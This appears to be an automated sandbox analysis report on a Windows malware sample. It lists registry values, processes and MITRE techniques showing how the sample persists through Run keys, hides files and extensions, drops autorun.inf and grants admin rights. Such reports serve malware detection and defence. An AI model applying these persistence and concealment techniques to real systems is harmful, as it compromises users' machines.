ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2022, 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe
Size

108KB
MD5

70aa65000971a15507d18d4ab0b3e6ef
SHA1

7cd24fe30c3a160a41a96a29fdd01e21f66d94bb
SHA256

ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b
SHA512

f12c78cf15784b1299e8666f1b59f384c31908e35a88704341fb0e11e4083f0e376ce062a2398ca0a5ced9664cb26d85e0a835651d37cc50ed03958d70060f34
SSDEEP

1536:hz43i6EJ02LyV3kFdp+0zI1ZBjhRDmmHeIcinLJcoHQHF3i6EJ02LyV3rEx:hzLyV3kF21im+YLzLyV3I

Score

10^/10

evasion persistence

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1644	attrib.exe
1444	attrib.exe
4240	attrib.exe
1124	attrib.exe
2736	attrib.exe
3744	attrib.exe

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe
File opened for modification	C:\autorun.inf	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe

Runs net.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe
5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 3472	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	85
PID 5112 wrote to memory of 3472	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	85
PID 5112 wrote to memory of 3472	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	85
PID 5112 wrote to memory of 4960	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	87
PID 5112 wrote to memory of 4960	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	87
PID 5112 wrote to memory of 4960	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	87
PID 5112 wrote to memory of 1284	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	89
PID 5112 wrote to memory of 1284	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	89
PID 5112 wrote to memory of 1284	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	89
PID 5112 wrote to memory of 840	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	93
PID 5112 wrote to memory of 840	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	93
PID 5112 wrote to memory of 840	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	93
PID 5112 wrote to memory of 4092	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	90
PID 5112 wrote to memory of 4092	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	90
PID 5112 wrote to memory of 4092	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	90
PID 5112 wrote to memory of 2304	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	94
PID 5112 wrote to memory of 2304	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	94
PID 5112 wrote to memory of 2304	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	94
PID 5112 wrote to memory of 4232	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	100
PID 5112 wrote to memory of 4232	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	100
PID 5112 wrote to memory of 4232	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	100
PID 3472 wrote to memory of 4240	3472	cmd.exe	96
PID 3472 wrote to memory of 4240	3472	cmd.exe	96
PID 3472 wrote to memory of 4240	3472	cmd.exe	96
PID 5112 wrote to memory of 176	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	98
PID 5112 wrote to memory of 176	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	98
PID 5112 wrote to memory of 176	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	98
PID 5112 wrote to memory of 224	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	102
PID 5112 wrote to memory of 224	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	102
PID 5112 wrote to memory of 224	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	102
PID 5112 wrote to memory of 2168	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	103
PID 5112 wrote to memory of 2168	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	103
PID 5112 wrote to memory of 2168	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	103
PID 5112 wrote to memory of 3580	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	106
PID 5112 wrote to memory of 3580	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	106
PID 5112 wrote to memory of 3580	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	106
PID 5112 wrote to memory of 1332	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	107
PID 5112 wrote to memory of 1332	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	107
PID 5112 wrote to memory of 1332	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	107
PID 5112 wrote to memory of 3692	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	128
PID 5112 wrote to memory of 3692	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	128
PID 5112 wrote to memory of 3692	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	128
PID 5112 wrote to memory of 3676	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	111
PID 5112 wrote to memory of 3676	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	111
PID 5112 wrote to memory of 3676	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	111
PID 5112 wrote to memory of 2600	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	110
PID 5112 wrote to memory of 2600	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	110
PID 5112 wrote to memory of 2600	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	110
PID 5112 wrote to memory of 4384	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	127
PID 5112 wrote to memory of 4384	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	127
PID 5112 wrote to memory of 4384	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	127
PID 5112 wrote to memory of 4644	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	114
